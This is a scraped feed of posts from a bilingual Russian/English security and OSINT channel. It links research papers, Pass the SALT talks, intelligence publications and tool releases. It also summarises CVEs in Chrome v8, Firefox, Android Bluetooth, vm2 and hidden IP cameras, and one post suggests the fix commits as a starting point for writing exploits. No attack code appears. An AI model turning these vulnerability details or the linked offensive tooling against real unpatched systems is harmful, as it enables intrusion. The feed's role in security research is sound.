|Studies in Intelligence 67, No. 2|🕵️‍♂️Вышел новый выпуск журнала для разведчиков: "Studies in Intelligence(Исследования в области Разведки)". Вкратце что за журнал можно почитать тут.📕Содержание журнала: 📑 Становление обучающейся организацией:Размышления об изучении интеллекта📑 Разведка и Конгресс:История, стоящая за беспрецедентными открытыми показаниями о Советских Стратегических Силах📑 Длительная дискуссия:Разведка США: профессия, сообщество или предприятие?📑 Комментарии и отклики:Теория трансформационного обучения и альтернативы препятствиям в развитии специалистов в области разведки📑 Основное напряжение: открытость и секретность📑 Механизм рассекречивания: Что история рассказывает о главных секретах Америки📑 Общение с разведкой: Написание статей и брифинг для Национальной Безопасности (3-е издание)📑 Хакер, инфлюэнсер, мошенник, шпион: Разведывательные службы в эпоху цифровых технологий📑 Задание Китай: Устная история американских журналистов в КНР📑 Вопрос о статусе: История ЦРУ📑 Гадючье гнездо Гитлера: Расцвет Абвера📑 Книжная полка офицера разведки - июнь 2023🕵️‍♂️A new issue of the magazine for intelligence officers has been published: "Studies in Intelligence ". In short, what kind of magazine can you read here.📕Contents of the magazine:📑Becoming a Learning Organization:Reflections on the Study of Intelligence📑Intelligence and Congress:The Story Behind the Unprecedented Open Testimony on Soviet Strategic Forces📑An Enduring Debate:US Intelligence: Profession, Community, or Enterprise?📑Commentary and Response:Transformational Learning Theory and Alternatives to Obstacles in the Development of Intelligence Professionals📑A Basic Tension: Openess and Secrecy📑The Declassification Engine: What History Reveals About America’s Top Secrets📑Communicating with Intelligence: Writing and Briefing for National Security (3rd edition)📑Hacker, Influencer, Faker, Spy: Intelligence Agencies in the Digital Age📑Assignment China: An Oral History of American Journalists in the People’s Republic📑A Question of Standing: The History of the CIA📑Hitler’s Nest of Vipers: The Rise of the Abwehr📑Intelligence Officer’s Bookshelf - June 2023#CIA #Intelligence #security #Congress #USSR #USA #China #Top_Secrets #spying #hacking #history #Hitler
2023-07-12 19:09:59
#CIA #Intelligence #security #Congress #USSR #USA #China #Top_Secrets #spying #hacking #history #Hitler Images
2023-07-12 18:24:15
📕Security Analysis: A Critical Thinking ApproachThis Book is brought to you for free and open access by Encompass.#security #thinking #analysis #open_source_information #intelligence_information
2023-07-12 18:24:00
None Images Images Images Images
2023-07-12 17:55:50
❗️❗️❗️ ВАЖНОЕ ОБЪЯВЛЕНИЕ В КОНЦЕ ПОСТА ❗️❗️❗️Друзья, как вы могли заметить, не так давно мы начали развивать совместный проект группы специалистов по OSINT — «Северная Пальмира».Идея проекта возникла как ответ на вызов настоящего времени. Да, индустрия OSINT пока не имеет в вашем представлении четкого очертания, инфраструктуры, внутреотраслевой статистики и прочих атрибутов, но динамично развивается на наших глазах: — Опыт специалистов копится 🐖— Сферы применения расширяются 🖋— Общественность все более осведомлена о дисциплине 👨‍💼Предлагаем каждому из вас стать частью данной индустрии, если вы еще не вовлечены Как это сделать? 😫 1. Самостоятельно изучать основы OSINT, быть частью сообщества и следить за обновлениями в группе.2. Написать Шварцу, стать нашим партнером и помогать в развитии канала 👨‍💼Каждый партнер получит доступ к эксклюзивным материалам, которые помогут разобраться в теме.Какие наши доказательства?⚜️Приходи 16 июля в 15:00 к нам на канал и посмотри сам! Для начала Const прочитает расширенный доклад о выявлении схем ухода от налогов, в т.ч. с помощью офшоров. Дальше будет еще интереснее!Я уже не новичок, что можете мне предложить? 😕Друг, мы только создаем инфраструктуру, придется подождать, но по итогу ты получишь доступ к внушительной информационной базе: собственная аналитика, консультации с профильными экспертами, бесплатный доступ к новым инструментам, консультацию по трудоустройству, базу вакансий и, если захочешь, возможность легально заниматься OSINT и зарабатывать 🇷🇺 Оставайтесь с нами и закидывайте админов предложениями, чего вам не хватает в текущей версии OSINT-комюнити.from «Северная Пальмира» with love 💙 Images
2023-07-12 17:41:05
🐫До сих пор не прекращаются новости про Silk Road, который на минуточку уже почти как 10 лет не работает(октябрь 2013, а Silk Road прикрыли в 2014). Данная статья на WIRED: "Silk Road’s Second-in-Command Gets 20 Years in Prison" проливает свет на подробности хода дела, фигурантом которого является Роджер Томас Кларк ака Cimon ака Cimon ака Plural of Mongoose, который являлся правой рукой Росса Ульбрихта. Да, Кларка приговорили к 20 годам тюремного заключения за его причастность к созданию и развитию Silk Road, хотя на самом деле "послужной" список преступлений не маленький, но не это меня заинтересовало.А заинтересовал момент с приобретением Tor 0-day эксплойта(ов)(а может и для firefox, тут вот не было уточнений, хотя кто знаком с утечками 1, 2 и 3, то...) для деанонимизации пользователей даркнета, занимающихся сексуальной эксплуатацией детей. Дальше - интереснее, он якобы в дальнейшем предоставил это правительствам Великобритании и США. Когда WIRED спросили по данному вопросу у предполагаемого продавца(может сплоитдева) с псевдонимом Grugq, то даже если бы он и действительно продал, а слова Кларка - не ложь, то ответ от Grugq логичен "I never sold such an exploit and certainly wouldn’t have sold it to him".🤷🏼‍♂️То есть, довольно чудновато и не понятно зачем Кларк отдельно затронул эту тему не так давно.🐫The news about Silk Road, which for a moment has not been working for almost 10 years, still does not stop(October 2013, and Silk Road was shut down in 2014). This article on WIRED: "Silk Road's Second-in-Command Gets 20 Years in Prison" sheds light on the details of the course of the case, the defendant in which is Roger Thomas Clark aka Cimon aka Cimon aka Plural of Mongoose, who was the right hand of Ross Ulbricht. Yes, Clark was sentenced to 20 years in prison for his involvement in the creation and development of Silk Road, although in fact the "track record" of crimes is not small, but that's not what interested me.And I was interested in the moment with the acquisition of the Tor 0-day exploit(s) (or maybe for firefox, there were no clarifications here, although who is familiar with leaks 1, 2 and 3, then ...) to deanonymize darknet users engaged in the sexual exploitation of children. Further - more interesting, he allegedly later provided it to the governments of the United Kingdom and the United States. When WIRED asked the alleged seller (maybe exploit dev) with the pseudonym Grugq on this issue, even if he really sold, and Clark's words are not a lie, the answer from Grugq is logical "I never sold such an exploit and certainly wouldn't have sold it to him."🤷🏼‍♂️That is, it's pretty weird and it's not clear why Clark separately touched on this topic not so long ago.#Tor #deanonymization #expoitation #marketplace #darknet #SilkRoad
2023-07-12 17:40:59
#Tor #deanonymization #expoitation #marketplace #darknet #SilkRoad Images
2023-07-11 21:04:44
💥В Firefox 115.0.2 and Firefox ESR 115.0.2 была зафикшена бага(CVE-2023-3600, UAF в жизненном цикле wokers, Bug 1839703) , которая могла привести к эксплуатабельному крашу.Коммит, в котором была зафикшена бага: 878cb82 "Move worker create into an Init() method r=nika" Images Images
2023-07-11 15:17:07
📲[critical] CVE-2023-21250(Bug id: 261068592) - BoF in gatt_end_operation(leads to RCE)Since response of the GATT server is handled in gatt_client_handle_server_rsp() and gatt_process_read_rsp(), the maximum length that can be passed into the handlers is bounded by GATT_MAX_MTU_SIZE, which is set to 517, which is greater than GATT_MAX_ATTR_LEN which is set to 512. The fact that there is no spec that gaurentees MTU response to be less than or equal to 512 bytes can cause a buffer overflow when performing memcpy without length check.🛡Fixed in commit ec573bc8 "Fix gatt_end_operation buffer overflow". Fixed in AOSP versions: 11, 12, 12L & 13⛓Intro to Bluetooth Generic Attribute Profile (GATT)⛓Public API for the Bluetooth GATT Profile. ⛓Practical Introduction to BLE GATT Reverse Engineering: Hacking the Domyos EL500⚙️Bluing is an intelligence gathering tool for hacking Bluetooth(scanning BR/LE Devices, LMP, SDP, GATT & vulnerabilities) Images
2023-07-11 13:47:25
📲Transparency in App Analytics: Analyzing the Collection of User Interaction Data#privacy #security #mobile #Android_apps #collected_data #user_interaction #SAST #evidence #UI #View #Button #Textfield
2023-07-11 13:47:21
#privacy #security #mobile #Android_apps #collected_data #user_interaction #SAST #evidence #UI #View #Button #Textfield Images Images Images Images
2023-07-11 13:39:06
Впервые прошу распространить среди тех, кто использует в какой-то степени библиотеку vm2( в канале добавил хэштег #vm2 для удобства).Поддержка данной библиотеки прекращена по причине обнаруженных критических проблем с безопасностью, которые не могут быть должным образом решены. Об уязвимостях сообщил @0x10n, как можно понять из проблемы - это SBX и как пишет XmiliaH: " I am not able to fix without changing the whole sandboxing strategy", а также: "The problems that piled up are caused by node intercepting calls from the sandbox and therefore arguments not being wrapped in a Proxy. As isolated-vm does create the sandbox on their own and does not rely on the vm module there shouldn't be hooks added by node that causes such issues."В скором времени скорее всего появятся подробности по поводу баги(ов), включая PoC(комментарий от @0x10n тут и тут .🛡Так что советую как можно скорее перейти на изолированную vm, к примеру на isolated-vm.#vm2 Images Images
2023-07-11 13:37:32
📕Towards Fine-Grained Localization of Privacy Behaviors#privacy #permissions #mobile #Android #ML #NMT #SAST #PriGen
2023-07-11 13:37:08
#privacy #permissions #mobile #Android #ML #NMT #SAST #PriGen Images Images Images Images
2023-07-10 14:06:59
Джаз затронул весьма интересную тему с тест поинтами на девайсах в рамках форензики. Замыкание тест поинта дает возможность перевести аппарат в режим EDL (Emergency Download Mode), который, как правило, используется для восстановления устройства (кирпич, проще говоря). В режим EDL можно перевести как из adb, fastboot, так и "аппаратно".Специалисты по криминалистике используют специализированное ПО, которое дает возможность брутфорсить пин-код, извлекать ключи шифрования, извлекать данные с устройства.Для извлечения используют специальный кабель, который можно либо купить, либо изготовить самому. Схема простая.Схема раз, видео по ней два, где купить три.Ну и как бонус - статья на codeby на данную тему
2023-07-10 12:58:40
🕵️‍♂️Cyber-threat intelligence for security decision-making: A review and research agenda for practice"We subsequently develop a research agenda for practice researchers addressing the critical research question: “How can cyber-threat intelligence be operationalized in organizations?”"#security #CTI #intelligence #Cyber_Attacks #strategies #vulnerabilities
2023-07-10 12:58:32
#security #CTI #intelligence #Cyber_Attacks #strategies #vulnerabilities Images Images Images
2023-07-10 01:05:03
#security #spy #camera #Anyka #vulnerabilities #RE #fw #IoT #P2P #persistence #RCE #Unencrypted_Communications
2023-07-10 01:04:37
📕Spying on the Spy: Security Analysis of Hidden Cameras🕵️‍♂️В данной работе демонстрируется анализ универсального модуля IP-камер, который часто используется в скрытых камерах. Как пример приложения для управления модулем был взят LookCam(App Store и Google Play), которое было подвергнуто обратной разработке, включая анализ сетевого трафика, что в дальнейшем помогло воссоздать систему безопасности камеры, включающую ОС в виде Линукса, прошивку(файловую структуру), механизм аутентификации, управление сеансами и удаленную связь с серверами в облаке. Собственно, в работе описываются недостатки безопасности во всех вышеописанных компонентах, которые и до исследования скорее всего эксплуатировались и исследователи предоставляют концептуальные атаки. Важным является момент с раскрытием серийного номера скрытой камеры, который в дальнейшем позволяет лицу достичь RCE.По сути цель слежки может получить контроль над действиями "шпиона", осуществляемые с помощью такой вот камеры для слежки, достигая произвольного выполнения кода удаленно(RCE), зная серийный номер камеры. Одна уязвимость уже получила CVE - CVE-2023-30400(command injection в скрипте конфигурации сети "station_connect.sh" в ОС MCU, SDK для ak3918ev300v18 MCU тут) . В работе исследователи также предоставляют смягчающие меры для каждого недостатка в безопасности.🕵️‍♂️This paper demonstrates the analysis of the universal IP camera module, which is often used in hidden cameras. As an example of an application for managing the module, LookCam(App Store & Google Play) was taken, which was reverse-engineered, including network traffic analysis, which later helped to recreate the camera's security system, including an OS in the form of Linux, firmware(file structure), authentication mechanism, session management and remote communication with servers in the cloud. Actually, the paper describes security flaws in all the components described above, which were most likely exploited before the study and the researchers provide conceptual attacks. An important point is the disclosure of the serial number of the hidden camera, which further allows the person to reach RCE.In fact, the target of surveillance can gain control over the actions of a "spy" carried out using such a surveillance camera, achieving arbitrary code execution remotely (RCE), knowing the serial number of the camera. One vulnerability has already received CVE - CVE-2023-30400 (command injection in the network configuration script "station_connect.sh" in the MCU's OS, SDK for ak3918ev300v18 MCU here) . In the paper, the researchers also provide mitigating measures for each security flaw.#security #spy #camera #Anyka #vulnerabilities #RE #fw #IoT #P2P #persistence #RCE #Unencrypted_Communications
2023-07-10 00:59:09
#security #spy #camera #Anyka #vulnerabilities #RE #fw #IoT #P2P #persistence #RCE #Unencrypted_Communications Images Images Images Images
2023-07-07 14:30:57
🕵️‍♂️ Microsoft-Extractor-Suite is a fully-featured, actively-maintained, Powershell tool designed to streamline the process of collecting all necessary data and information from various sources within Microsoft.📑 DocumentationThe following Microsoft data sources are supported:💾Unified Audit Log💾Admin Audit Log💾Mailbox Audit Log💾Inbox Rules💾Transport Rules💾Message Trace Logs💾Azure AD Sign-In Logs💾Azure AD Audit Logs💾OAuth Permissions💾Azure Activity Logs#DFIR #Microsoft #Microsoft365 #AD #Azure #OAuth #Mailbox #Exchange #cmdlets #Logs
2023-07-07 10:52:34
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с Pass the SALT 2023 и укомплектовал в архив.🗃Your humble servant downloaded all currently available presentations from Pass the SALT 2023 and archived them.#pts23 #security #privacy #vulnerabilities #expoitation #RE #AI #fw #cryptography #TPM #DRTM #TCB #UEFI #Bluetooth #BLE #QubesOS #typosquatting #email #sensitive_hashing #fingerprints #DataMining #Darknet #SocialNetworkMonitoring #AIL #collect #crawl #dig #analyze #microArchitecturalAttacks #SupplyChain #Rust #DFIR #TI #bootloader #U_Boot #Debian #NTLM #Wireshark #RFID #TCP #deobfuscation #microcode #GeoIP #LFI #PHP #PHP_filter_chains #zkSNARK #parsers #DER #ASN_1 #CTI #MISP #STIX #RPC #Suricata
2023-07-07 10:50:54
#pts23 #security #privacy #vulnerabilities #expoitation #RE #AI #fw #cryptography #TPM #DRTM #TCB #UEFI #Bluetooth #BLE #QubesOS #typosquatting #email #sensitive_hashing #fingerprints #DataMining #Darknet #SocialNetworkMonitoring #AIL #collect #crawl #dig #analyze #microArchitecturalAttacks #SupplyChain #Rust #DFIR #TI #bootloader #U_Boot #Debian #NTLM #Wireshark #RFID #TCP #deobfuscation #microcode #GeoIP #LFI #PHP #PHP_filter_chains #zkSNARK #parsers #DER #ASN_1 #CTI #MISP #STIX #RPC #Suricata Images
2023-07-07 09:54:52
АНОНС❗️❗️❗️Ну что, бойцы. Завтра мы немножко поподкастим))08.07.23 в 21:00 по Мск мы поговорим с уважаемым Шизо на тему:Идентификация киберпреступников: что ЗА осинтом?На встрече обсудим:- действительно ли то, что мы привыкли считать анонимным, является таковым? (сеть TOR, ОС Whonix и прочее)- Методы борьбы с киберпреступниками их же методами: как спецслужбы используют социальную инженерию, взлом систем, эксплуатацию уязвимостей в средствах анонимизации для идентификации?- Баги и бэкдоры, приводящие к деанонимизации: самые яркие случаи- Дело техники: какие навыки, сферы посоветуешь освоить, чтобы понимать полноценный цикл расследований, а не только OSINT?Никаких серьёзных мероприятий. Просто болталка на интересную тему с интересным человеком. У кого есть желание - залетаем к нам на базу, там всё будет:https://t.me/BaseOfSquad
2023-07-07 09:53:50
🕵️‍♂️Интересно, с какой целью ЦРУ удалили последний выпуск своего журнала для разведчиков "Studies in Intelligence 67, No. 1"(пост на канале), причем новый выпуск 67, No. 2(июньский), по-прежнему не выходит.Ответы на эти вопросы есть, осталось дождаться нового выпуска.🕵️‍♂️I wonder for what purpose the CIA deleted the last issue of its intelligence magazine "Studies in Intelligence 67, No. 1" (a post on the channel), and the new issue 67, No. 2 (June), is still not being published.There are answers to these questions, it remains to wait for the new release.#CIA #Intelligence #magazine #CSI #Studies_in_Intelligence Images
2023-07-07 08:44:50
|AppSec Ezine|📰490rd EditionRelease Date: 07/07/2023pathonprojectgithub#ezine #appsec #infosec Images
2023-07-06 18:33:53
📕Centauri: Practical Rowhammer Fingerprinting"Centauri is a Rowhammer fingerprinting approach that can build a unique and stable fingerprints even across devices with homogeneous or normalized/obfuscated hardware and software configurations. To this end, Centauri leverages the process variation in the underlying manufacturing process that gives rise to unique distributions of Rowhammer-induced bit flips across different DRAM modules. Centauri's design and implementation is able to overcome memory allocation constrains without requiring root privileges."🤔"Our evaluation on a test bed of about one hundred DRAM modules shows that system achieves 99.91% fingerprinting accuracy."⚙️ Program for testing for the DRAM "rowhammer" problem.🔖 Exploiting the DRAM rowhammer bug to gain kernel privileges📕Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript#deanonymization #Fingerprinting #hw #sw #expoitation #DRAM #memory_cells #Rowhammer #Centauri
2023-07-06 18:32:31
None Images Images Images Images
2023-07-06 18:07:10
🧅DarkHorse: A UDP-based Framework to Improve the Latency of Tor Onion Services
2023-07-06 18:07:00
#anonymity #privacy #Tor #E2E #relays #Latency #DarkHorse #IP_spoofing #MTD #asymmetric_paths #onion_services #UDP Images Images Images
2023-07-06 17:02:51
📕Increased Truebot Activity Infects U.S. and Canada Based Networks🔖Breaking the silence - Recent Truebot activity🔖TrueBot Analysis Part I - A short glimpse into packed TrueBot samples🔖TrueBot Analysis Part II - Static unpacker🔖TrueBot Analysis Part III - Capabilities🔖Investigating Intrusions From Intriguing Exploits🔖Carbon Black’s TrueBot Detection🔖A Truly Graceful Wipe Out#CSA #CISA #FBI #MS_ISAC #CCCS #USA #Canada #CL0P #ransomware #botnet #Truebot #Raspberry_Robin #Flawed_Grace #Cobalt_Strike #Teleport #CVE_2022_31199 #expoitation #Phishing #IoCs #TTPs #Detection #DFIR
2023-07-06 17:02:42
#CSA #CISA #FBI #MS_ISAC #CCCS #USA #Canada #CL0P #ransomware #botnet #Truebot #Raspberry_Robin #Flawed_Grace #Cobalt_Strike #Teleport #CVE_2022_31199 #expoitation #Phishing #IoCs #TTPs #Detection #DFIR Images Images Images Images Images Images Images Images Images
2023-07-05 18:16:33
None Images Images Images
2023-07-05 17:05:32
📼How to Become Friends With Your RA Team📼I hack U-Boot📼Fixing spelling mistakes in Debian packages with 578 github pull requests📼Fixing NTLM decryption in Wireshark📼RFID wristbands use in music festivals📼Equity in TCP📼Strings deobfuscation in pseudocode with microcode manipulation📼How to get rid of MaxMind GeoIP database?📼Dry running iptables-legacy scripts -- a PoC📼Lookyloo, the missing demo from the morning🌐 Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. 📼Badge story📼PHP filter chains: How to use it🔥Partial File Read in phpList <= 3.6.12(CVE-2023-35834)🔥PHP filter chain generator is a CLI to generate PHP filters chain, get your RCE without uploading a file if you control entirely the parameter passed to a require or an include in PHP🔥PHP filter chains: file read from error-based oracle is a CLI to exploit parameters affected by the file read caused by the the error-based oracle of PHP filter chains. 📼zekrom: an open-source library of arithmetization-oriented constructions for zkSNARK circuits💥 zekrom is an open-source library of arithmetization-oriented constructions for zkSNARK circuits. The goal of zekrom is to analyze the performance of novel constructions for circuits using modern libraries such as arkworks-rs and halo2.📼ASN.1 templating for fun and profit🔥 asn1template is a tool takes a DER or PEM encoded ASN.1 structure and outputs the equivalent textual description that can be edited and later be fed to ASN1_generate_nconf(3) in order to build the equivalent DER encoded ASN.1 structure.📼How to survive to STIX parsing?💥MISP-STIX-converter is a Python library (>=3.8) to handle all the conversions between the MISP standard format and STIX formats.📼Decrypt Kerberos/NTLM “encrypted stub data” in Wireshark🔖Exercise files if you want to follow along or train yourself after the session📼Using Suricata to detect lateral movement in Windows environment📼Why cyberoffense will never be regulated#pts23 #security #privacy #vulnerabilities #expoitation #RE #AI #fw #cryptography #TPM #DRTM #TCB #UEFI #Bluetooth #BLE #QubesOS #typosquatting #email #sensitive_hashing #fingerprints #DataMining #Darknet #SocialNetworkMonitoring #AIL #collect #crawl #dig #analyze #microArchitecturalAttacks #SupplyChain #Rust #DFIR #TI #bootloader #U_Boot #Debian #NTLM #Wireshark #RFID #TCP #deobfuscation #microcode #GeoIP #LFI #PHP #PHP_filter_chains #zkSNARK #parsers #DER #ASN_1 #CTI #MISP #STIX #RPC #Suricata
2023-07-05 17:05:21
📼Vulnerabilities in the TPM 2.0 reference implementation code📼For Science! - Using an Unimpressive Bug in EDK II To Do Some Fun Exploitation📼Ultrablue: User-friendly Lightweight TPM Remote Attestation over Bluetooth🔥 Ultrablue (User-friendly Lightweight TPM Remote Attestation over Bluetooth) is a solution to allow individual users to perform boot state attestation with their phone. It consists in a server, running on a computer, acting as the attester, and a graphical client application, running on a trusted phone, acting as the verifier.📼The Good, the Bad, and the Secure: a pentester's journey daily driving Qubes OS📼Syslog-ng 4.0 – where log management is heading📼Analyse your weird URLs the easy way📼Typosquatting-finder📼Clustering large amount of email with Minhash: an open-source Locality sensitive hash📼Data Mining, Darknet and Social Network Monitoring - Exploring the Latest Features of the AIL Framework🔥 AIL(Analysis Information Leak) is a modular framework to analyse potential information leaks from unstructured data sources like pastes from Pastebin or similar services or unstructured data streams. AIL framework is flexible and can be extended to support other functionalities to mine or process sensitive information (e.g. data leak prevention).📼Reproducible Research in Micro-architecture Security (and Beyond): from Paper to Artifact Evaluation📼Supply-chain security in open-source ecosystems: the Rust case📼Introduction to Sigstore: cryptographic signatures made easier💥Project Sigstore is a new standard for signing, verifying and protecting software.📼How to Secure Your Software Supply Chain and Speed-Up DFIR with Hashlookup💥The hashlookup project provides a complete set of open source tools and open standards to lookup hash values against known database of files. Hashlookup helps to improve and speed-up DFIR.📼Map your firmware!🔥 Pyrrha is a filesystem cartography and correlation software focusing on visualization. 📼Gepetto: AI-powered reverse-engineering💥 Gepetto is a Python script which uses OpenAI's gpt-3.5-turbo and gpt-4 models to provide meaning to functions decompiled by IDA Pro.📼Threat Intel or Threat ?#pts23 #security #privacy #vulnerabilities #expoitation #RE #AI #fw #cryptography #TPM #DRTM #TCB #UEFI #Bluetooth #BLE #QubesOS #typosquatting #email #sensitive_hashing #fingerprints #DataMining #Darknet #SocialNetworkMonitoring #AIL #collect #crawl #dig #analyze #microArchitecturalAttacks #SupplyChain #Rust #DFIR #TI #bootloader #U_Boot #Debian #NTLM #Wireshark #RFID #TCP #deobfuscation #microcode #GeoIP #LFI #PHP #PHP_filter_chains #zkSNARK #parsers #DER #ASN_1 #CTI #MISP #STIX #RPC #Suricata
2023-07-05 17:05:14
💥Недавно появились записи выступлений с конференции Pass the SALT, ниже прикладываю названия выступления с ссылками на оные(тут и тут).💥Recordings of speeches from the Pass the SALT Conference have recently appeared, below I attach the names of the speeches with links to them(here & here).#pts23 #security #privacy #vulnerabilities #expoitation #RE #AI #fw #cryptography #TPM #DRTM #TCB #UEFI #Bluetooth #BLE #QubesOS #typosquatting #email #sensitive_hashing #fingerprints #DataMining #Darknet #SocialNetworkMonitoring #AIL #collect #crawl #dig #analyze #microArchitecturalAttacks #SupplyChain #Rust #DFIR #TI #bootloader #U_Boot #Debian #NTLM #Wireshark #RFID #TCP #deobfuscation #microcode #GeoIP #LFI #PHP #PHP_filter_chains #zkSNARK #parsers #DER #ASN_1 #CTI #MISP #STIX #RPC #Suricata Images
2023-07-04 23:21:47
🧅Произошел не слабый такой скачок числа пользователей луковичной маршрутизации(TOR), по большей степени прирост замечен со стороны жителей Германии(скорее всего подключались к немецким VPN эндпоинтам, а затем уже к сети TOR для...).🧅There was not a weak such jump in the number of users of onion routing(TOR), to a greater extent the increase was noticed by residents of Germany(most likely, users connected to German VPNs endpoints, and then to the TOR network for...).#Tor #metrics #Germany Images Images Images Images
2023-07-04 16:34:43
Смотрю у многих появились проблемы с ВПН, а конкретно с OpenVPN. У меня никаких проблем нет (сервер на vdsina), но на всякий случай имею установленный matsuri и папочку с ТГ каналами, где выкладывают конфиги для подключения.Matsuri это клиент vmess/vless/trojan и так далее. Про это можно почитать у джаза или где угодно в интернете.Также есть софтинка, которую также выкладывал джаз, где собираются конфиги. Сам не юзал, но пускай будет.Также конфиги вы можете найти на гитхабе и просто в инете.Пользуйтесь на здоровье :)
2023-07-04 13:11:18
Продолжаю путь изучения browser exploitation.💥При изменении количества временных слоев в видео кодеке AV1(AOMedia Video 1, компонент Internals>Media>Video, разработан для интернет-видео и оптимизирован для видеоконференций с интеграцией WebRTC, поддерживает MP4 и WebM) - svc_params_.number_temporal_layers, происходит эксплуатабельный краш, в последствии который может привести к UAF(CVE-2023-3421, Issue 1447568).Зафикшена бага была путем инициализации svc_params.number_temporal_layers значением 1 во время настройки параметров SVC(software video encoder) в стабильной версии 114.0.5735.198/199 хрома.Тест кейсы, которые были в коммите могут нам помочь при написании триггера➡️рабочего эскплойта.В следующем коммите была зафикшена бага: 💾 f312efa "webcodecs: Fix crash when changing temporal layer count in AV1 encoder"(60b9379 cherry pick, замержено ) Images Images
2023-07-03 17:00:33
🛡Digital Identity Standards#ENISA #security #policy #standardisation #Digital_Identity #EU_Digital_Identity_Wallet #ICAO #mDL_mdoc #Mobile_eID #PKI_PMI #X509 #SAML #eIDAS #OpenID #OAuth2_0 #SSI #DIDs #AdES
2023-07-03 17:00:29
#ENISA #security #policy #standardisation #Digital_Identity #EU_Digital_Identity_Wallet #ICAO #mDL_mdoc #Mobile_eID #PKI_PMI #X509 #SAML #eIDAS #OpenID #OAuth2_0 #SSI #DIDs #AdES Images Images Images Images Images
2023-07-03 11:55:51
📕End-to-End Multi-Tab Website Fingerprinting Attack: A Detection Perspective"In this work, we redefine the problem of MT-WFA as detecting multiple monitored traces, given a natural untrimmed traffic data including monitored traces, unmonitored traces, and potentially unconstrained overlapping between them. This eliminates the above assumptions, going beyond the conventional single website fingerprint classification perspective taken by all previous WFA methods. To tackle this realistic MT-WFA problem, we formulate a novel Website Fingerprint Detection (WFD) model capable of detecting accurately the start and end points of all the monitored traces and classifying them jointly, given long, untrimmed raw traffic data."🔖Github repo with source code.#security #Fingerprinting #MT_WFA #WFD #Tor #E2E
2023-07-03 11:55:39
#security #Fingerprinting #MT_WFA #WFD #Tor #E2E Images Images Images Images
2023-07-03 10:50:33
⛓1day link Private Shizo(fully free)
2023-07-02 21:28:51
📕Lessons From Two Years of Crypto Audits#BlackHatUsa_2019 #security #cryptography #audit #crypto_protocol #blockchain #vulnerabilities #Rust
2023-07-02 21:28:34
#BlackHatUsa_2019 #security #cryptography #audit #crypto_protocol #blockchain #vulnerabilities #Rust Images Images Images Images Images Images Images Images Images Images
2023-07-02 21:20:47
🐍Web-based cryptography is always snake oilДовольно интересная и короткая статья про проблемы сетевой криптографии и в целом про взгляд на веб-приложения с E2E шифрованием, являющимся по большей степени "snake oil".A rather interesting and short article about the problems of network cryptography and, in general, about a look at web applications with E2E encryption, which is mostly "snake oil".#security #E2E #Web #JS #SRI #cryptography #hash #HPKE #Whatsapp #Signal #Apple #Snowden #FBI #PRISM Images
2023-07-02 18:26:57
🕵️‍♂️Argumentation Schemes for Blockchain Deanonymization#deanonymization #LegalReasoning #ArgumentationSchemes #DFIR #forensics #Cryptocurrency #blockchain
2023-07-02 18:26:53
#deanonymization #LegalReasoning #ArgumentationSchemes #DFIR #forensics #Cryptocurrency #blockchain Images Images Images
2023-07-02 18:15:29
🔥(0Day) ManageEngine ADSelfService Plus GINA Client Insufficient Verification of Data Authenticity Authentication Bypass Vulnerability(CVE-2023-35719, CWE-288)This vulnerability allows physically present attackers to execute arbitrary code on affected installations of ManageEngine ADSelfService Plus. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Password Reset Portal used by the GINA client. The issue results from the lack of proper authentication of data received via HTTP. An attacker can leverage this vulnerability to bypass authentication and execute code in the context of SYSTEM.⚠️Vulnerability is confirmed to work all the way down to ADSelfService Plus version 4.2.9, which was released in 2012, and up to the latest version 6.3 Build 6301 at the time of writing (2023-06-23) Images Images Images
2023-07-02 18:14:12
🪙Summarizing and Analyzing the Privacy-Preserving Techniques in Bitcoin and other Cryptocurrencies#privacy #deanonymization #anonymity #pseudo_anonymity #Cryptocurrencies #BTC #XMR #ZEC #Traceability_with_Transaction_Graphs #CommonInputOwnership_Heuristic #Fingerprinting #Round_Numbers #Taint_Analysis #Dust_Attacks #Equal_Output_CoinJoin_Transactions #RingSignatures #StealthAddresses #RingCTs #Z_Addresses #zk_SNARKs
2023-07-02 18:13:17
#privacy #deanonymization #anonymity #pseudo_anonymity #Cryptocurrencies #BTC #XMR #ZEC #Traceability_with_Transaction_Graphs #CommonInputOwnership_Heuristic #Fingerprinting #Round_Numbers #Taint_Analysis #Dust_Attacks #Equal_Output_CoinJoin_Transactions #RingSignatures #StealthAddresses #RingCTs #Z_Addresses #zk_SNARKs Images Images Images Images Images
2023-07-01 14:50:25
🔥🔥🔥 StackCheck может иметь побочные эффекты( на уровне компиляции в v8) и если значение(value) будет являться JSObject,которое можно отслеживать как прототип экземпляра(value->IsJSObjectThatCanBeTrackedAsPrototype()), причем прототип экземпляра мог был быть присоединен к дереву переходов, вместо установления на мапах(все это в рантайме).Собственно данные условия позволяли достичь в v8 type confusion(CVE-2023-3420, зарепортил @mmolgtm).Данная бага(chromium:1452137) была зафикшена в стабильной версии 114.0.5735.198/199 хрома.В следующих коммитах была зафикшена бага:💾 e548943 "[compiler] StackCheck can have side effects"💾 c7c4477 "[runtime] Set instance prototypes directly on maps" Images Images
2023-07-01 14:45:09
📕FBI FOIA #1577572 Section 01"In November of 1991 a systems administrator for the Cray supercomputer at the NAS Facility at NASA Ames Research Center discovered that intrusions had been made into the front-end of the computers supporting the Cray after a trojan horse was found installed. The Cray had been used by a hacker to begin cracking passwords, all systems were then taken offline by NASA administrators for a week. An investigation revealed a series of attacks on NASA computers at Ames that lasted from October through December of 1991. These attacks were linked to internet hosts in the area of Sidney in Australia. This document is a response from the FBI to a FOIA request relating to these incidents."#USSS #NASA #ARC #FBI #FOIA #trojan #hacking #Australia #Operation_Weather #WANK #REALM #Electron #Phoenix #Nom #Assange
2023-07-01 14:45:00
#USSS #NASA #ARC #FBI #FOIA #trojan #hacking #Australia #Operation_Weather #WANK #REALM #Electron #Phoenix #Nom #Assange Images Images Images Images
2023-06-30 23:52:55
